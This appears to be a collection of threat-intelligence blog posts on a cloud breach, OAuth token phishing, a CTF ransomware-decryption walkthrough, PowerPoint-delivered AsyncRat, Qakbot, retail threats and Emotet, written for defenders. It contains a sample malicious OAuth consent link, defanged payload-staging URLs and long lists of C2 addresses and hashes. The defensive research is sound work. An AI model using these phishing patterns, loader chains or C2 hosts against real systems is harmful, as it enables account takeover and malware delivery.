Trouble in Paradise

A case study of Cloud compromise

Many organisations are increasingly moving to cloud solutions to solve their hosting needs, but outsourcing workload should not imply outsourcing security as well. The importance of security the cloud was recently highlighted by targeting of Microsoft Azure environments by Nobellium, the threat actor behind the SolarWinds Orion compromise. The threat actor notably exploited stolen SAML certificates for vertical movement, a rarely seen technique. Even without novel techniques, less sophisticated cybercriminal threat actors can also pose a threat to companies’ services in the cloud. Indeed, this week’s supply chain compromise operation by REvil is suspected to have been launched from a compromised web server hosted on AWS.

The Incident

Recently, DarkLab’s incident response team has helped a South Asian client in the media sector to remediate an incident involving multiple cloud environments breaches, a case study we think can help organisations better plan for secure implementations of their cloud environments.

The incident originated from a likely exploitation of a known remote code execution vulnerability in a Jenkins instance, an open source software development automation server. The server was hosted in an Amazon Web Service (AWS) environment and had a hardcoded root access key. With that, the threat actor was able to roam the compromised environment undetected for four months. Logs availability has been an issue due to the lack of CloudTrail log retention but we know that the threat actor created multiple IAM user accounts and accessed internal data, including those stored in S3 buckets via the free Windows client S3 Browser.

Their primary intent, however, was to use the victim as a jumping spot to identify other targets vulnerable to the same Jenkins RCE and move laterally to their servers. They did so by deploying Linux and Windows virtual machines in new EC2  instances  in the compromised environment to scan and exploit external IP addresses. The did so using T.2 micro sizing to avoid spikes in usage and remain hidden. The attacker deployed the additional EC2 instances in a different AWS region than that used by the victim, an anomaly that we suggest organisations monitor for.

A deeper dive into the system log of the Linux VMs shows that the attacker likely used Shodan to identify other vulnerable Jenkins instances online, suggesting their targeting was likely opportunistic. Similarly, analysis of the IP addresses used by the attacker to access our client – most of them AWS instances themselves – suggests the attack likely originated from multiple other compromised organisations.

From AWS, the threat actor managed to access a FTP server within a parallel Google Cloud Platform (GCP) environment. For this, they used a compromised hard-coded credential found in one of the configuration files in their BitBucket repository, also suspected to be compromised. After thorough environment and users’ enumeration, the attacker was able to obtain the password for another G-Suite user account, which they used to access data in the GCP environment and Google Drive.

Shortly after accessing the GCP,  threat actors attempted to cover their tracks by deleting the company’s entire production environment, all hosted on AWS, and the backup copies. Fortunately, AWS retained some copies of the deleted backups which were able to provide to the victim organisation.

However, while the victim restored their AWS system they were not aware to reset the root access key. Unsurprisingly, the attacker quickly re-established a presence in their cloud and a few days later they re-deleted the production environment, although no ransom demand was recorded. This was when our incident response team was called to help.

Assessment

Our investigation suggested that the threat actor behind this campaign is likely operating opportunistically and with a relatively low technical know-how. We often found traces of internet searches for open source tools or “how to” techniques. Nonetheless, such an actor could still pose significant operational damage to a large company by deleting their production environment.

The incident shows how even relatively unsophisticated threat actors are adopting an island-hopping approach by abusing imperfect implementations of commercial cloud platforms. Companies should ensure that standard security practices, like rotating passwords or access keys, monitoring suspicious activities, and prompt patching, are also applied to cloud environments.

What’s next?

Our experience suggests that this was not an uncommon attack path for adversaries targeting cloud environments. Monitoring for common attack vectors can help indeitifyuing supicious behaviour earlier and contain an incident before it is too late.

Below are some monitoring metrics mapped against Mitre ATT&CK tactics that we recommend organisations implement to AWS Config, Lambda, or their choice of CSPM platforms for automated detection and remediation.

Feel free to contact us at [threatintel at darklab dot hk] for the full set of 50 custom MITRE-based rules on AWS

TacticTechnique (custom)Log Source
Initial accessAWS user login failed multiple timesCloudTrail
Initial accessMultiple worldwide successful console login GuardDuty
Initial accessPotential Web scanning activities with multiple web server 400 error from same the source IPWeb access log
Privilege EscalationAWS “AssumeRole” from rare external AWS accountCloudTrail
DiscoveryAWS potential IAM enumeration ActivitiesCloudTrail
Defense Evasion/ PersistenceCreate/Update managed policy with excessive permissionCloudTrail
ImpactAWS Access Key EnabledCloudTrail
ExfiltrationEgress rule added to a security groupCloudTrail

Not Token for Granted

New phishing campaign against financial services steals OAuth tokens to bypass MFA in O365 accounts

DarkLab recently discovered a suspicious email which we identified as part of an active phishing campaign primarily targeting banks and investment companies worldwide, including a number of targets in Hong Kong. The campaign initially seemed aimed at stealing victims’ credentials, a common tactic among threat actors. However, a closer look showed that threat actors leveraged OAuth2 framework to gain permissions to the victim’s O365 account by exploiting a rogue Azure application. This would have allowed them to bypass multifactor authentication controls and directly access the victim’s account with a stolen OAuth token, rendering this a particularly effective social engineering tactic.

Overall, this campaign shows how financially motivated threat actors are evolving their tactics, techniques, and procedures to exploit companies’ increasing reliance on cloud infrastructure.

Phishing email analysis

The email is sent from a domain of a separate entity, likely compromised by the threat actor before initiating the attack against our client. The email metadata also suggests deliberate spoofing of the SMTP FROM header.

The email contains a fake e-signature verification request, along with a link to “Review and sign”.

The link is crafted to present the user with a request screen (see figure above) to grant permissions to a rogue Azure application. Depending on threat actors’ intent, permissions request can be modified to allow access to cloud-hosted documents and applications, including the email account.

Here is an example of the phishing link:

hxxps://login.windows.net/common/oauth2/authorize?response_type=code&client_id=70ab9cd5-96a5-4dee-b9af-xxxxxxxxxxxx&client_secret=ef17da38-f26c-49d9-9c9c-xxxxxxxxxxxx &redirect_uri=https%3A%2F%2Fkp3jccawgk[.]online&resource= https%3A%2F%2Fkp3jccawgk[.]online&state=xxxxxxxxxxxx #efe1b61bcf8df6b76595xxxxxxxxxxxx

The url above represents an access requested to the Microsoft Identity platform with a request for an authorization code, denoted by the response_type flied. The client_id field denotes the unique ID of an Azure application owned by the threat actor, with a redirect_uri field pointing to a domain – kp3jccawgk[.]online – staged by the threat actor to capture the redirected HTTP request once the victim grants the access permission.

To create such an attack infrastructure the threat actor only needs to register a rogue application under an Azure tenant, and to host a website to capture the URL requests and  authorization codes. The redirected site also contains JavaScript snippets that detect the accessing IP address and details of the victim organisation, very likely for victims’ profiling and filtering out potential accesses from security vendors.

Eventually, the victim is redirected to a blank page, now defunct.

Threat actors would then leverage the rogue application and request a valid access token with the authorization code. They could then access the victim’s O365 account with the permissions granted during the phishing process, and perform a variety of actions from accessing account information to sending emails on behalf of the victim.

This attack aims at stealing access tokens in form of OAuth. This allows direct access to a victim’s account and bypasses the need to steal valid user credentials, including multi-factor authentication.

Attack infrastructure and insights into the campaign

By pivoting on the redirect domain, we were able to identify multiple threat actors’ domains suggesting that they are very likely targeting banks, asset managers, equity firms, and in a lesser degree also law firms and consultancies around the world, including Hong Kong. According to domain registration data, the campaign started at the end of February and it is currently active. Based on the nature of its targeting the campaign appears to be financially-motivated.

Detection and remediation

To detect malicious behavior linked to a user falling victim to a similar phishing email, the most effective way is to monitor Azure audit logs for “Consent to Application” events. These represent users’ approval to grant permissions to third-party applications. Microsoft Cloud App Security is also a good location to detect new OAuth applications with high privileges in the tenant.

Sample Microsoft Azure log showing a Consent to Application event for a malicious Azure application

In the event where an internal user falls victim and consent is given to rogue application, IT teams can manually remediate the applied access under the “Enterprise Application” section of Microsoft Azure portal, and ensure that the user credentials are reset and protected by MFA. As a preventive measure, IT teams are also recommended to leverage the Azure AD Admin Consent to force administrator involvement to gatekeep user data against such kind of attack tactic.

Indicators of compromise

  • 188.166.68[.]51
  • kp3jccawgk[.]online
  • 17l78xgnzj[.]online
  • 4zl8t4sqon[.]online
  • 9ybzef6d2h[.]online
  • cprapid[.]com
  • cts1g02r2c[.]online
  • kp3jccawgk[.]online
  • l7p5g1kwh4[.]online
  • num7ewnkn1[.]online
  • rh6757nysb[.]online
  • wbxputufpj[.]online
  • wzoschqdd0[.]online

Hackaday 2020 – Securing the basics [P-3]

Incident Response and Threat Intelligence Challenge

As we mentioned in our previous posts on the Web and Cloud challenges, every year DarkLab organises a capture the flag cybersecurity competition designed for undergraduate students aiming to raise the competency level of future talents to better prepare them for a meaningful career in cybersecurity.

HackaDay 2020 was held on 2 December 2020, and saw the Open University of Hong Kong’s YH team crowned as winning team, and the Hong Kong University of Science and Technology’s Machine Brickers as runners up.

The theme this year was “Security the Basics”, based on the experience and real life challenges that organisations in Hong Kong have faced in 2020 – as observed by our own Red Team and Incident Response professionals.

In this series of three blog posts, we want to provide the solution to the different challenges students faced. We hope that this will stimulate even more students to get their hands on the keyboard next year! In this post we cover the Incident Response (IR) and Threat Intelligence (TI) questions.

Ransomware Attack Again 1 (50 pts, 14 solves)

Description: Our client has been hit by a ransomware attack. While the rest of the client’s PCs have been restored, the head of IT insists to decrypt the data to recover an important screenshot of server settings and passwords. They refuse to pay the ransom. The sysadmin left only the snapshot of the infected server.

It seems there is not much left to see. We’re reaching out to you, our best malware analyst, to help research and find a way to decrypt the screenshot.

RDP: hackaday2020-teamX-ransomware.eastasia.cloudapp.azure.com ,  X is your team number

After connecting via RDP to the machine, we can see another user named sysadmin by navigating around the file system. On that user desktop, the following are found :

  • Ransomware affected file with extension HKADYYY
  • Ransom note HKADYYY-README, containing a flag

hackaday{y0u_hAve_b33n_R@ns0meD!}

Ransomware Attack Again 2 (100 pts, 7 solves)

Description: Other than the ransom note, what other artefacts could you find?

By navigating the windows event logs, we notice a suspicious code snippet under powershell – large base64 payload (powershell with -e option).

The following two values are found by decoding the base64

  • Caller script : . $prog -InV 'MTIzNDU2Nzg5MDEyMzQ1Ng=='
  • Second flag

hackaday{wHo$_G0T_my_r@r1Sonn?!}

Ransomware Attack Again 3 (50 pts, 2 solves)

Description: sometimes there is public research on the ransomware behavior which may help you to decrypt the files. Try to surf the net!

A search online will not reveal much, until you check on Twitter, where you will find the following tweet.

The tweet contains the following link : https://0bin.net/paste/xBy4OoNz#0lSty7wpQSy2risE3g6X2Idj4HTNyhy6YaUgeWBmC0-

This 0bin.net post includes a small summary of the ransomware, a decryption routine, and the third flag hackaday{Blrdi3 w!th th3 g00d n@vvS}

Ransomware Attack Again 4 (300 pts, 0 solves)

Description: You are in the final step, tell me the content of the decrypted file!

According to the decryption routine, successful decryption requires two values :

  1. IV : Given by base64 string located in the loader : MTIzNDU2Nzg5MDEyMzQ1Ng==
  • Key-seed : random two-digit and the SID (obtained by checking the user that executed the ransomware i.e. sysadmin)

00S-1-5-21-1580626154-3826959220-856111413-500 to 99S-1-5-21-1580626154-3826959220-856111413-500

The following decryption code is implemented with the IV and Key (two digit is 99):

$IV = "MTIzNDU2Nzg5MDEyMzQ1Ng=="
$Key = "ODgxM2QyOTU4ZjljODAzOGVjMDhiMjljYjFjODgzMGM="
$aesManaged = New-Object "System.Security.Cryptography.AesManaged"
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
$aesManaged.IV = [System.Convert]::FromBase64String($IV)
$aesManaged.Key = [System.Convert]::FromBase64String($Key) 
$decryptor = $aesManaged.CreateDecryptor();
$fileToDecrypt = "C:\path\to\encrypted\file.HKADYYY"
$encryptedFile = [System.IO.File]::ReadAllBytes($fileToDecrypt)
$bytes = $encryptedFile
$unencryptedData = $decryptor.TransformFinalBlock($bytes, 0, $bytes.Length);
[System.IO.File]::WriteAllBytes($fileToDecrypt,$unencryptedData)
Rename-Item -Path $fileToDecrypt -NewName ($fileToDecrypt.Substring(0, ($fileToDecrypt.Length - 8)))
$aesManaged.Dispose() 

Using the routine to decrypt the file:

Decryption routine will reveal the final flag

hackaday{fr33d!fin@l1y~}

That’s is for this blog series, we hope you enjoyed reading and looking forward to seeing you at Hackaday 2021!

Presentation is Key

Criminals exploit PowerPoint documents and blog infrastructure to deliver RAT and steal cryptocurrency

DarkLab has recently responded to cybercriminal phishing attempts in APAC exploiting unusual tactics, techniques and procedures (TTPs). While most phishing we observe contain MS Word or Excel attachments, this one exploited malicious PowerPoint (.ppt) files to eventually deploy AsyncRat malware and a bitcoin stealer.

Exploitation of PowerPoint attachments is not entirely new. However, it is rare enough to remain uncommon and therefore increase the chances that unaware users would open malicious attachments.

This phishing campaign, likely still active, appears to be focused on Asia, particularly China, although we also found samples uploaded on a popular multi-vendor AV scanner from countries in Europe.  Most of the titles of the malicious documents are generic. However, the use of titles such as “Hotel Doc” for some of their lures suggests that the hospitality industry is one of the sectors targeted.

Phishing lure analysis

The first phishing email we picked up caught our attention for its use of Traditional Chinese characters used in Hong Kong and Taiwan, as opposed to the Simplified Chinese used in Mainland China. The email included a malicious PowerPoint attachment named 付款詳情.ppt [MD5:
8311c59ef727826c4b54e182a956e312], which contains malicious and obfuscated macros. The macro only  executes when the file is closed by the user, in a likely attempt to avoid raising the victim’s suspicion.

Fig 1 – Deobfuscated payload [MD5: 127538a7d8703ec96a5e39e9fd235c06]

After deobfuscation it is clear that the VBA macro leverages the legitimate binary mshta.exe to connect to a hardcoded URL masked with the j.mp URL shortening service. The hardcoded URL eventually redirects to tumharimaakachodamarunmaine[.]blogspot[.]com/p/3-sunda-10-origin[.]html

Attack infrastructure and timeline

J.mp is a separate address for the better known bit.ly shortening service. According to bitly’s statistics, the malicious URL discovered was created at the end of February.

Fig 2 – bitly creation data for the malicious URL

The URL points to a server used by the threat actor to stage a range of malicious payloads, from cryptocurrency stealers to an open source remote access trojan (RAT). We will get to that in a second.

Pivoting on the identified staging server revealed a significant number of additional attack infrastructure, a new URL for each phishing document. These servers were all hidden behind the same j.mp shortening server and hosted on Blogspot infrastructure.

By checking the URLs creation date on bitly we were able to get a timeline of the malicious campaign, which shows how the threat actor behind it has been active since the beginning of the year and has recently increased their activity.

Fig 3 – timeline of attack infrastructure set up

Payloads

In terms of payload, we could only examine one malicious URL [Tumharimaakachodamarunmain[.]blogspot[.]com/p/42[.]html] and found a number of scripts. We suspect that other URLs may host different payloads.

Fig 3 – Screenshot of the malicious webpage

The webpage looks benign at first glance. However, accessing it with MSHTA triggers on the victim’s endpoint a number of JavaScript payloads embedded on the website.

The first script executes a set of VBScripts that fetch the content of the following link:

hxxps://ia801408.us.archive[.]org/25/items/defender_202103/defender[.]txt

The file is deobfuscated and dropped on %Public%\bin.vbs before execution, and it aims at disabling security controls for subsequent malware executions.

Fig 4 – First script disables system’s security settings

The second script reaches out to the following URL, again with MSHTA : mylundisfarbigthenyouthink.blogspot.com/p/42.html

It contains three additional payloads to disable security defences and hiding attackers’ windows to hide malicious activity.

Then, an additional PowerShell script is executed by loading the script from two additional sites depending on the system architecture.

hxxps://ia601401.us.archive[.]org/24/items/2_20210304_20210304_2014/1[.]txt

hxxps://ia601401.us.archive[.]org/24/items/2_20210304_20210304_2014/2[.]txt

The payload will reflectively load two additional samples: a heavily obfuscated DLL with anti-analysis mechanisms [MD5: d1a426b9afe2ca1e56cdf48523c684e3], and an open source RAT called AsyncRat [MD5: 47c012de1faac9be5a860b600a06c5ee].

AsyncRat is able to send and receive commands, record keystrokes and screenshots, and upload/download files via SFTP, among other functions.

The threat actors also tries to steal victims’ cryptocurrencies by replacing the legitimate wallet address with one controlled by the attackers. This is done via the Powershell script shown below that looks for BTC wallets addresses in the clipboard and and replaces them with another one. Our research into the attacker’s BTC address shows that it had two small transactions, suggesting the attacker had so far only limited success.

Fig 4 – PowerShell script for cryptocurrency theft

Finally, the last script downloaded from the stager domain attempts to terminate instances of excel.exe and winword.exe in attempt to hide attacker’s tracks.

Conclusion

The attacker’s exploitation of open source malware and abuse freely available Blogspot URLs as malicious infrastructure highlights the increasing lowering barrier of entry for cybercriminal operations in Asia. Despite the relatively low-level nature of this threat in terms of technical sophistication, the use of malicious PowerPoint attachments shows some innovation in their social engineering tactics. Overall, this campaign shows how even low-cost but complex cybercriminal campaigns can pose a threat to organisations by leveraging unusual social engineering techniques and open source tools.

Indicators of Compromise

  • tumharimaakachodamarunmaine.blogspot.com
  • tumharimaakachodamarunmain.blogspot.com
  • ifyouarebadtheniamyourdadhehe.blogspot.com
  • myralundpakarloab.blogspot.com
  • mylunissharp.blogspot.com
  • mylundisfarbigthenyouthink.blogspot.com
  • 8311c59ef727826c4b54e182a956e312
  • d1a426b9afe2ca1e56cdf48523c684e3
  • 47c012de1faac9be5a860b600a06c5ee
  • f7fd745b52fb8e791254492eca2c41df9281430dcbc5b56baa715b32eeb417ed
  • ae133004d194c3701d0b2051904d07ad69c901830a710cc2de6cb465c67bdc9d
  • 015224452b3232f76924d4020b45cfc954b80a4f14563d9fe7dadffb1699f090
  • 4be0a1ade0230dc10ef523d30d3f28ab1e70a4b5587086edfcdbfa9b30fb9c9a
  • a07e7d0a6699cbcb960bbe8c3a34b85a878abda0d19cd98d2e0ce170369c7ccf
  • d925e0405f8b9a4c0c06751a36318bcccd54721c107c08dc851fec12b58ec9ab
  • 78599a0757c19b98f6d5ec650a5f80181f90117215edcf5f79c7099c12f9710a
  • 4199e3e42abb7d71ca8183609e80225014ce4b232990d526ec0655b889aac5fd
  • 46730c85c3da44a3bfc2d4786db1bf1b0f13a0c523c3b7ae88749b3538d1b8c1
  • 4f0d613797aa59fbcb957162c37d586e020cfb65a886972b404bbda4473d0b5e
  • 65bbecd4400d257e8eb367b56ec846de4e4efaf3274622fd01c8751adde5d30b
  • 266ffecbcb98bd2401298ca8fbe8bdc9df9fd8ebdfee8acf267a43cedd870050
  • f9498a2b0d6c38da6ad465a0135c5d20817bffeaf5ed09b9de8a7a22ec1ada58
  • 4a90be311633d5052b7ef4c6edd0ccddd472daab1ce183af0763b69d47ce4406
  • dc36dea840aec26090afba82b6a93f706b73c850286e6d80d95bf0604cc72d43
  • 9da6a119d0986bb18a84cef88915c5934074d189b57c0ee62103b24549f1fd51
  • 78599a0757c19b98f6d5ec650a5f80181f90117215edcf5f79c7099c12f9710a

Robber Duck

Qakbot goes phishing in Hong Kong

Since the beginning of 2021, DarkLab analysts have observed multiple clients and third-party organisations in Hong Kong targeted with malicious phishing emails aimed at delivering the Qakbot malware, also referred to as Quakbot or Qbot. While the Qakbot payload is well researched in open source, we want to shed light on the observed attack chain to raise awareness of this threat and help mitigate future phishing attempts against organisations in Hong Kong and APAC.

Since the takedown of Emotet, one of the largest spam botnets and initial access broker, cybercriminals behind Qakbot have increased their operational tempo and are actively targeting  Hong Kong. We therefore expect Qakbot to remain a threat for the region in the coming months, particularly due to Qakbot links to known ransomware families.

Infection chain

Qakbot started as a banking trojan in 2009 but has since 2019 been seen exfiltrating sensitive financial data and email threads from victims, as well as delivering the ProLock ransomware.

The phishing emails we observed were sent from likely compromised third party companies. These previous victims were based around the globe, from South America to Asia, highlighting the global scope of Qakbot’s operations.

The email’s subject and text suggest the threat actors have hijacked email threads to add a layer of credibility to their phishing lures. In one case, a phishing email to a large company in the real estate sector referred to an existing high-profile event that the target organises each year, likely suggesting the phishing attempt was somewhat targeted rather than completely opportunistic.

Fig 1 – phishing email to a property developer delivering QakBot malware

Other phishing emails, like one sent to a retail organisation (see below), threat actors attempted to spoof the sender to make it look like it was coming from an organisation based in Hong Kong.

Fig 2 – phishing email to a retailer delivering QakBot malware

The emails have a compressed archive attached, containing a macro-enabled Excel document.

Fig 3 – overview of Qakbot infection chain

The latter displays a generic DocuSign template and requires user interaction to activate the malicious macros hidden in the workbook.

Fig 3 – phishing lure used to deliver QakBot malware

We analysed one such lure document [filename: Document_1204144908-12232020-Copy.xlsm ; MD5: 77a6bf34403b2a4e6e2eaa4435d22b50] which executes macros that serve as a dropper. The dropper contacts one of five command and control (C2) URLs in an attempt to download the same file called, in this case, 55555555555.jpg, a DLL file containing the second stage of the malware. Other droppers analysed also showed similar behavior despite the different stager servers and DLL names dropped.

We also found numerous documents similar to the one we analysed, reinforcing how this was indeed part of a larger phishing campaign.

Fig 4 – Example of similar phishing documents on Virus Total

The macro eventually starts the malicious DLL [MD5: 66adf2e8e5561bf7cf3f3cb50d9256bf] run via rundll32.exe, a technique used by threat actors to proxy execute malicious code while avoiding detection by security systems.

Fig 5 – Qakbot execution of malicious DLL via legitimate process

This specific campaign is linked to one of Qakbot’s botnets called abc117, while security researchers have linked other botnets, like abc123, to spam campaigns in other parts of the world. Malware operators often use different botnets to ensure resilience from law enforcement action and their ability to deliver malware to a wider range of targets.

Conclusion

Despite the successful law enforcement action against one of the largest spam botnets, Emotet, in January, our findings suggest that other botnets are ready to step into the vacant spot left by it.

Operations like Qakbot show how phishing will remain a significant threat for companies in Hong Kong, as threat actors use similar malware to obtain an initial foothold in companies’ networks and to deploy further malware, like human-operated ransomware.

Strong email security processes and users’ awareness remain paramount to avoid initial infection from similar phishing campaigns that can lead to very impactful ransomware incidents. Threat feeds can also help detect often-changing attack infrastructure of botnets like Qakbot by providing up-to-date indicators of compromise for ingestion of security detection systems. In particular, we found that URLhaus’ database contains a useful source of malware URLs for Qakbot that can aid network defenders.

C2 servers hardcoded in Qakbot DLL analysed

Note that not all the below IPs are likely to be still actively used for malicious purposes, please apply caution when using them for blocking.

67.6.54.180:443197.49.109.229:995149.28.101.90:8443
187.250.170.34:99575.67.192.125:44345.77.115.208:8443
67.141.11.98:443187.202.130.179:443216.215.77.18:2078
109.154.79.222:222267.82.244.199:222245.32.211.207:8443
2.88.184.160:44341.228.211.35:443207.246.77.75:2222
85.52.72.32:2222197.82.221.199:443207.246.77.75:995
86.98.21.234:44390.53.100.20:222298.16.204.189:995
73.166.10.38:5000337.210.132.106:99580.106.85.24:2222
90.61.30.155:2222191.84.1.58:44386.126.220.203:443
71.182.142.63:44373.166.10.38:6120271.14.110.199:443
178.223.22.192:99586.98.223.81:2283.110.241.182:443
184.189.122.72:44380.11.5.65:222276.111.128.194:443
181.39.236.199:443187.7.236.197:99532.212.117.188:443
72.240.200.181:222281.214.126.173:222272.36.59.46:2222
154.238.45.174:99590.201.21.58:44368.186.192.69:443
47.22.148.6:44389.137.211.239:995105.226.38.36:443
2.51.251.47:99524.234.204.230:995109.106.69.138:2222
199.19.117.131:443189.222.83.156:443108.46.145.30:443
200.76.215.87:443181.134.233.216:443181.129.155.10:443
37.104.39.32:99595.77.144.238:44337.210.255.225:995
14.137.64.132:995100.43.250.74:99574.195.52.3:443
70.126.76.75:44369.47.239.10:44373.166.10.38:443
5.194.151.240:2222151.52.8.91:443190.24.187.90:443
83.202.68.220:2222197.237.62.207:44395.77.223.148:443
189.251.67.57:99589.136.112.74:44347.196.49.123:443
197.161.154.132:443190.85.91.154:44324.229.150.54:995
120.150.218.241:9952.50.167.241:443189.172.242.124:443
75.136.40.155:443193.248.154.174:2222140.82.49.12:443
151.205.102.42:443207.246.77.75:8443212.197.145.59:995
41.39.134.183:44324.139.72.117:44347.208.8.187:443
187.213.80.185:995149.28.99.97:22222.88.48.122:995
82.12.157.95:99545.63.107.192:222268.15.109.125:443
77.136.21.144:995144.202.38.185:4432.90.219.195:443
47.40.78.73:443207.246.77.75:443151.60.45.241:443
173.18.126.193:2222149.28.98.196:443217.165.3.30:443
51.9.198.164:2222149.28.98.196:995190.72.211.89:2222
94.26.114.54:443149.28.101.90:222284.247.55.190:8443
197.45.110.165:995149.28.101.90:99574.222.204.82:995
184.90.50.79:995144.202.38.185:99598.240.24.57:443
77.30.61.241:99585.204.189.105:44392.59.35.196:2083
47.134.138.15:44396.19.117.140:443174.20.167.39:995
196.151.252.84:443106.250.150.98:44345.63.107.192:443
23.236.12.55:44398.190.24.81:44396.61.23.88:995
81.88.254.62:44337.116.152.122:2078108.190.151.108:2222
105.198.236.99:443172.87.157.235:338945.77.115.208:995
78.97.248.88:443216.201.162.158:443144.202.38.185:2222
188.25.61.41:44395.76.27.6:44324.185.65.68:443
45.77.115.208:443174.87.65.179:443149.28.98.196:2222
45.77.115.208:222250.244.112.106:44324.122.0.90:443
45.32.211.207:995189.157.252.151:443175.141.131.195:443

Criminal Shopping Habits

Cyber threats to the retail sector

The retail industry is increasingly gearing towards e-commerce platforms and cashless, even contactless, payments – a trend accelerated by the Covid-19 pandemic.

Even before that in 2020 41% of shoppers said they would purchase items online for things they would normally go to the store for. In 2019, 53% of Hong Kong residents tried to be completely cashless, according to Visa. The retail and consumer landscape is clearly changing rapidly, and cyber threats facing the industry are following accordingly.

As payments increasingly move online, so do cybercriminals’ attempt to steal payment card data. Traditional point of sale (POS) malware attempts to steal customers data by infecting retailers’ POS devices. While still present, POS malware is losing effectiveness due to increasingly secure cards standards like EMV, and because of the growing use of contactless payments, including mobile payment systems like Apple Pay and Google Pay.

Consumers’ growing appetite for ecommerce has therefore led criminals to adopt new tactics. One of the most widespread includes stealing payment data on ecommerce websites by injecting malicious JavaScript skimmers in checkout pages, a technique known as Magecart.

The growing threat of web skimmers

Magecart is a common and hard to detect threat for online retailers. Researchers estimate that every 15 seconds one e-commerce website is infected with MageCart malicious code. Some large scale Magecart operations have compromised thousands of websites at a time, including about 2000 e-commerce sites in just three days in September. Criminals injected malicious JavaScript code likely via outdated v1 and v2 versions of the Magento e-commerce platform.

Compromise of popular third-party e-commerce platforms like Magento allows criminals to automatically deploy JavaScript skimmers on hundreds of vulnerable victims at the same time. Indeed, the name Magecart itself refers to this common intrusion vector (Magecart = Magento + shopping Cart).

Magecart supply chain compromise are widespread. However, websites can also be targeted in direct operations by exploiting existing vulnerabilities. Malicious changes to check out pages are often minimal and hard to detect. Criminals can just append a few lines of code to a legitimate JavaScript library to avoid detection. A US precious metal retailer this year discovered that Magecart card-stealing code was present on their website for some five months, likely affecting tens of thousands of customers. The incident highlights the stealth and long term impact that a Magecart compromise can have on retailers.

Example of Magecart compromise

Human-operated Ransomware

Although customers’ data are a precious criminal commodity, cybercriminals also target retailers’ networks for extortion. Human-operated ransomware, in particular, is among the most impactful and widespread threat that DarkLab analysts have observed targeting Hong Kong organisation in 2020.

This year we helped two prominent Hong Kong retailers responding to network compromises by the Maze and Netwalker ransomware families. As it is increasingly common among ransomware operators, the retailers were threatened with data leaks on top of the data-encryption coercion. For retailers that process a significant amount of customers’ data, a data leak can present significant reputational and regulatory concerns, not to mention the operational impact that a widespread systems’ encryption can cause.

As we previously reported, ransomware operators often exploit known vulnerabilities in victims’ external IT estates (including for SSLVPN appliances), and exposed remote access services like RDP. However, large scale phishing campaigns like those of Emotet can also result in ransomware deployment. A specialist news outlet recently highlighted how most malware infections – even from unknown or low level variants – should be treated as potential ransomware incidents due to the growing popularity of initial access brokers malware services.

Business email compromise remains a concern

DarkLab also observed companies in the retail sectors becoming victim of another widespread threat, business email compromise. The international supply chain Hong Kong retailers rely on makes them a target for fraudsters looking to impersonate distant third parties to misappropriate funds. As working from home arrangements are becoming more prevalent, fraudsters are also looking to hijack communications between two employees in the same territory. The lack of physical interactions between employees makes email fraud easier.

To do that, fraudsters adopt ingenious social engineering techniques. These include passively monitoring email exchanges from a compromised email account while only modifying a few selected terms – like bank account details. This can lead to employees not realising their communications have been compromised until it is too late.

Strict rules for unusual bank transfers, as well as good email security hygiene can help prevent, or at least detect, these kinds of incidents.

Opportunistic attacks are more than a nuance

Some attacks can be less sophisticated than others but still require lengthy and cumbersome responses. For instance, DarkLab is aware of a retailer operating in Hong Kong that was recently infected in a likely automated fashion by a self-spreading crypto miner. The malware exploited an exposed RDP server, but was quickly detected by the victim’s security system. Nonetheless, time and resources had to be spent to conduct a thorough systems audit to ascertain the extent of the intrusion.

Similarly, data breaches can expose large amount of customer data and pose a significant threat despite the perceived lack of attackers’ sophistication. In September, a threat actor on a popular hacking forum released almost 3 million customer records from an online hospitality company with operations in Hong Kong, Singapore and Malaysia.[1] Although technical details of the breach are unclear, similar incidents often see criminals exploiting relatively unsophisticated techniques like SQL injections and exploitations of known vulnerabilities.

A thorough review of your online footprint and implementation of basic cyber security hygiene can help prevent such opportunistic attacks.

Conclusion and mitigation

The current situation of the COVID-19 pandemic affecting the globe has led to an uptick in cybercrime across all sectors. However, the ongoing sales and the coming Christmas season are likely to see retailers particularly targeted. Healthcare restrictions are forcing customers to rely on e-commerce platforms for purchasing products of all kinds.

With the holiday season coming into full swing, the amount of online purchases will likely to be at an all-time high. While there are clear opportunities for retailers to enjoy returns on a digital-focused business model, threat actors are also looking to exploit above mentioned techniques for their own malicious purposes.

Based on DarkLab’s experience in helping retail clients respond to network intrusions and uplift their security posture, we recommend organisations to:

  • Enforce Multifactor Authentication on all remote access services, including VPN, RDP and cloud environments.
  • Ensure ongoing visibility over all external-facing assets, and conduct regular vulnerability scan on external IP addresses.
  • Ensure mail filtering in place to block inbound email that fails SPF, DKIM, or DMARC checking.
  • Conduct regular security review of 3rd party code running on sensitive web pages like check out pages.
  • Enforce Content Security Policy to regularly review what domains can access your site and what resources they are allowed to load. This can help avoid Magecart exfiltrating customers’ data from your site.
  • Consider adopting compliance as code to ensure breaches of pre-established security measures are automatically detected and stopped.

Researching Emotet in Hong Kong

How spam campaigns can threaten regional transport hubs

Emotet is among the most widespread cybercriminal campaigns to date. Originally developed as a banking trojan to steal victims’ banking credentials, it eventually evolved in a vehicle to spread third party malware via large spam campaigns. Emotet developers have been collaborating for months with those of Trickbot and Qakbot to deliver ransomware, which means that an Emotet infection would likely lead to widespread system unavailability.

The most recent wave of Emotet emerged in July, and in September it was reportedly sending large amount of spam emails to Japan and New Zealand, among other target countries.  

DarkLab researchers found evidence that between August and September Emotet also targeted organisations in Hong Kong, a region previously unreported to be affected by this threat.

According to phishing emails uploaded to a popular malware repository, organisations in the retail, transport, and telecommunications sectors were among Emotet’s targets, although more companies are likely to have received their malicious emails.

Among the targets identified, particularly worrying is the presence of Hong Kong’s main airport. The organisation was very likely not compromised, or they would not have uploaded the phishing email to a malware repository, but as Emotet often leads to ransomware, a successful infection would have likely had serious impact on one of the largest airports in Asia Pacific.

Figure 1 – screenshot of Emotet phishing email to a Hong Kong victim

Attack chain analysis

DarkLab analysts observed that the emails were sent by Emotet’s epoch2 botnet, abusing or spoofing previously compromised organisations in other countries. The phishing emails contain MS Word attachments with relatively generic filenames such as invoice.doc and MJ-1759 report.doc. Upon opening the document, the user is enticed to click an enable content button, a standard technique to activate malicious macros.

Figure 2 – screenshot of MJ-1759 report.doc (MD5:e1b8b7b710a639b0697a5f3b5e6a00bb)

The heavily obfuscated malicious macros then load a base64-encoded Powershell script into memory, which is used to download an executable from one of seven hardcoded URLs. The use of multiple dropper sites is to ensure successful malware delivery even if one or more malicious sites are taken down

